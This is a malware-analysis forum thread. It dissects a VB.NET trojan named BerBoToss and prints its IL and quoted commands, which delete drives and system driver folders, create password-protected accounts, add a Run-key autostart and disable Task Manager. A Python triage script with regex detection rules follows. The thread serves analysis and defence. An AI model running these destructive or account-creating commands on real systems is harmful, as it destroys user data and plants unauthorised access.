A forum for reverse engineering, OS internals and malware analysis 

 #1493  by STRELiTZIA
 Tue Jul 13, 2010 6:54 pm
Hi,
It is a Windows PE EXE file, written in VB.NET.
This Trojan performs several malicious actions: destroying and altering data with malicious intent, causing computer malfunction, displaying an informative message, and logging the system out after creating new password-protected user sessions. This malware sample has very basic infection methods and aggressive behaviour, deleting specific files.
Filename: BerBoToss.exe
Language: MS Visual Basic.NET
Author according to version information:
3an9oud-La3jeb Hackers
Maroc Fes City BerBoToss
Session name: 3an9oud-La3jeb
Password: 1MarocBerbotossFes
Session name: Berbotoss_L39
Password: 1MarocBerbotossFes
Session name: Fes_L39_Berbotoss
Password: 1MarocBerbotossFes
Session name: Administrateur
Password: 1marocberbotossfes  <-- lower case
Disable Task Manager:
.method public static void DisableTaskMgr(bool Enable)
.locals init (bool V0)
switch DisableTaskMgr_0, DisableTaskMgr_1   // IL switch: value 0 jumps to the first target, 1 to the second

DisableTaskMgr_1:
call class BerBoToss.My.MyComputer BerBoToss.My.MyProject::get_Computer()
callvirt get_Registry()
ldstr "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
ldstr "DisableTaskMgr"
ldstr "1"                                   // DisableTaskMgr = "1" blocks Task Manager for the current user
callvirt SetValue
DisableTaskMgr_0:
call class BerBoToss.My.MyComputer BerBoToss.My.MyProject::get_Computer()
callvirt get_Registry()
ldstr "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
ldstr "DisableTaskMgr"
callvirt SetValue
Create text files:
ldstr "C:\\wmnpdmod.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
ldstr "C:\\msimg32.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
ldstr "C:\\kbdhe340.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
Kill processes:
ldstr "firefox"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "IEXPLORE"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "notepad"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "msnmsgr"
callvirt void [System]System.Diagnostics.Process::Kill()
Copy itself:
ldstr "cmd /c copy BerBoToss.exe C:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe E:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe F:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe D:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe g:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe C:\\WINDOWS\\BerBoToss.exe"
Create new user sessions:
ldstr "net user Administrateur /add"
ldstr "net user Fes_L39_Berbotoss /add"
ldstr "net user 3an9oud-La3jeb /add"
ldstr "net user Berbotoss_L39 /add"
ldstr "net user Fes_L39_Berbotoss 1MarocBerbotossFes"
ldstr "net user 3an9oud-La3jeb 1MarocBerbotossFes"
ldstr "net user Administrateur 1marocberbotossfes"
ldstr "net user Berbotoss_L39 1MarocBerbotossFes"
Rename hard disk labels:
ldstr "label c: 3an9oud-La3jeb"
ldstr "label d: 3an9oud-La3jeb"
ldstr "label e: 3an9oud-La3jeb"
ldstr "label f: 3an9oud-La3jeb"
ldstr "label g: 3an9oud-La3jeb"
ldstr "label h: 3an9oud-La3jeb"
ldstr "label l: 3an9oud-La3jeb"
Delete NET session:
ldstr "cmd /c NET SESSION * /del"
ldstr "cmd /c NET SESSION \\poste_connect? /del"
Remove directories:
ldstr "cmd /c rd d:\\ /s/q"
ldstr "cmd /c rd e:\\ /s/q"
ldstr "cmd /c rd f:\\ /s/q"
ldstr "cmd /c rd g:\\ /s/q"
ldstr "cmd /c rd C:\\WINDOWS\\system32\\drivers /s/q"
Delete specific files:
ldstr "cmd /c del C:\\*.mp3 /s/q"
ldstr "cmd /c del C:\\*.jpg /s/q"
ldstr "cmd /c del C:\\*.zip /s/q"
ldstr "cmd /c del C:\\*.rar /s/q"
ldstr "cmd /c del C:\\*.lnk /s/q"
ldstr "cmd /c del C:\\*.3gp /s/q"
ldstr "cmd /c del C:\\*.lrc /s/q"
ldstr "cmd /c del C:\\*.html /s/q"
Set new system time:
ldstr "cmd /c Time 11:11.00"

Set new system date:
ldstr "cmd /c date 01/1/1987"
Lock workstation:
ldstr "cmd /c rundll32.exe user32.dll,LockWorkStation"
Start default Internet Explorer:
ldstr "hxxp://fassifasso.tripod.com/xxx.xxx/BerBoToss/index.html"
call class [System]System.Diagnostics.Process [System]System.Diagnostics.Process::Start(class System.String)

Set malware startup:
ldstr "cmd /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v BerBoToss /t REG_SZ /d C:\\WINDOWS\\BerBoToss.exe"
Clipboard:
callvirt class MyServices.ClipboardProxy Devices.Computer::get_Clipboard()
ldstr "BerBoToss V1.0"
Display message:
ldstr "BerBoToss Operation !!! Chinass Hakda Kayfahmo Chinass Hakda kayssam3o Hada Message lik Ou Lihoum _+... Daba AdiosS Amigoss"
ldstr "Maroc Fes Erreur HTTA 39 - Mardankore.dll ... & "
call value class MsgBoxResult Interaction::MsgBox(class System.Object, value class MsgBoxStyle, class System.Object)
box MsgBoxResult
Last sample: 1/41 VT scan
http://www.virustotal.com/fr/analisis/d ... 1279046904
Attachments (pass: malware): 6 KiB and 5.73 KiB.
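The post recovers the sample's behaviour from its `ldstr` operands. The following is an added example, not code from the original post or from the sample: .NET stores every string literal as UTF-16LE in the #US metadata heap (ECMA-335 II.24.2.4), so a UTF-16LE strings pass over the raw file recovers the same `cmd /c` lines without a disassembler, and a few regexes then bucket them by behaviour and pull out the indicators a responder needs (created accounts and their passwords, the Run key entry, the volume label). The blob it scans is constructed inside the script from the strings quoted in the post, laid out like a #US heap; the rule names and the IoC layout are this example's own choices. It will not see strings a packer or obfuscator has encrypted.

```python
"""Recover a .NET sample's string literals and triage them by behaviour.

Added example for this thread, not the post's or the sample's own code.
The scanned blob is constructed below from the strings quoted in the post.
"""
import re
from collections import defaultdict


def _compressed_uint(v: int) -> bytes:
    """ECMA-335 compressed unsigned int, used as the #US entry length prefix."""
    if v < 0x80:
        return bytes([v])
    if v < 0x4000:
        return bytes([0x80 | (v >> 8), v & 0xFF])
    raise ValueError("length too large for this example")


def _us_entry(s: str) -> bytes:
    """One #US heap entry: length prefix, UTF-16LE chars, one terminal byte."""
    enc = s.encode("utf-16le")
    return _compressed_uint(len(enc) + 1) + enc + b"\x00"


# Constructed input: ldstr operands from the post, laid out like a #US heap
# and padded with non-string bytes. This is NOT the real BerBoToss.exe.
SAMPLE_STRINGS = [
    "cmd /c copy BerBoToss.exe C:\\WINDOWS\\BerBoToss.exe",
    "net user Administrateur /add",
    "net user Berbotoss_L39 /add",
    "net user Administrateur 1marocberbotossfes",
    "net user Berbotoss_L39 1MarocBerbotossFes",
    "label c: 3an9oud-La3jeb",
    "cmd /c NET SESSION * /del",
    "cmd /c rd C:\\WINDOWS\\system32\\drivers /s/q",
    "cmd /c del C:\\*.jpg /s/q",
    "cmd /c Time 11:11.00",
    "cmd /c date 01/1/1987",
    "cmd /c rundll32.exe user32.dll,LockWorkStation",
    "cmd /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    " /v BerBoToss /t REG_SZ /d C:\\WINDOWS\\BerBoToss.exe",
    "C:\\wmnpdmod.dll",
    "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss",
]
SAMPLE_BYTES = (
    b"MZ\x90\x00" + bytes(24)                                   # fake header
    + b"\x00" + b"".join(_us_entry(s) for s in SAMPLE_STRINGS)  # #US heap
    + b"\xff\xfe\x00\x00" * 4                                   # trailing junk
)


def extract_utf16le_strings(data: bytes, min_len: int = 6) -> list:
    """Printable-ASCII strings stored as UTF-16LE runs of at least min_len chars."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16le") for m in pattern.finditer(data)]


CMD_PREFIX = re.compile(r"^cmd(?:\.exe)?\s+/c\s+", re.I)


def normalize(s: str) -> str:
    """Drop a leading 'cmd /c ' so the rules see the command that actually runs."""
    return CMD_PREFIX.sub("", s).strip()


# Behaviour rules; the labels are this example's own, chosen from the post.
RULES = [
    ("persistence",    re.compile(r"^reg add .*\\CurrentVersion\\Run\b", re.I)),
    ("account_create", re.compile(r"^net user (\S+) /add", re.I)),
    ("account_passwd", re.compile(r"^net user (\S+) (?!/)(\S+)$", re.I)),
    ("destruction",    re.compile(r"^(rd|rmdir|del|erase) ", re.I)),
    ("file_copy",      re.compile(r"^copy \S+ ", re.I)),
    ("volume_label",   re.compile(r"^label [a-z]: ", re.I)),
    ("clock_tamper",   re.compile(r"^(time|date) ", re.I)),
    ("lock_station",   re.compile(r"LockWorkStation", re.I)),
    ("session_kill",   re.compile(r"^net session ", re.I)),
]


def classify(strings: list) -> dict:
    """Bucket each string by matching rule; unmatched strings land in 'other'."""
    report = defaultdict(list)
    for raw in strings:
        cmd = normalize(raw)
        hits = [label for label, rx in RULES if rx.search(cmd)]
        for label in hits or ["other"]:
            report[label].append(cmd)
    return dict(report)


RUN_KEY = re.compile(r"^reg add (\S*\\CurrentVersion\\Run)\s+/v\s+(\S+).*?/d\s+(\S+)", re.I)


def extract_iocs(strings: list) -> dict:
    """Accounts (name -> password), Run key entries and volume labels from the commands."""
    accounts, run_keys, labels = {}, [], set()
    for cmd in map(normalize, strings):
        if m := re.match(r"^net user (\S+) /add$", cmd, re.I):
            accounts.setdefault(m.group(1), None)
        elif m := re.match(r"^net user (\S+) (?!/)(\S+)$", cmd, re.I):
            accounts[m.group(1)] = m.group(2)
        elif m := RUN_KEY.match(cmd):
            run_keys.append((m.group(1), m.group(2), m.group(3)))
        elif m := re.match(r"^label [a-z]:\s+(.+)$", cmd, re.I):
            labels.add(m.group(1))
    return {"accounts": accounts, "run_keys": run_keys, "volume_labels": sorted(labels)}


if __name__ == "__main__":
    found = extract_utf16le_strings(SAMPLE_BYTES)
    for label, cmds in classify(found).items():
        print(f"[{label}]")
        for c in cmds:
            print("    " + c)
    print(extract_iocs(found))
```

To run it against a real file, replace `SAMPLE_BYTES` with `open(path, "rb").read()`; the rules are deliberately anchored at the start of the normalized command so that a `del` inside a path or a message string does not count as destruction.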
 #1512  by EP_X0FF
 Wed Jul 14, 2010 2:22 pm
One of the most ridiculous trojans I've ever seen :D Number two, after a 260 MB trojan with pr0n video inside.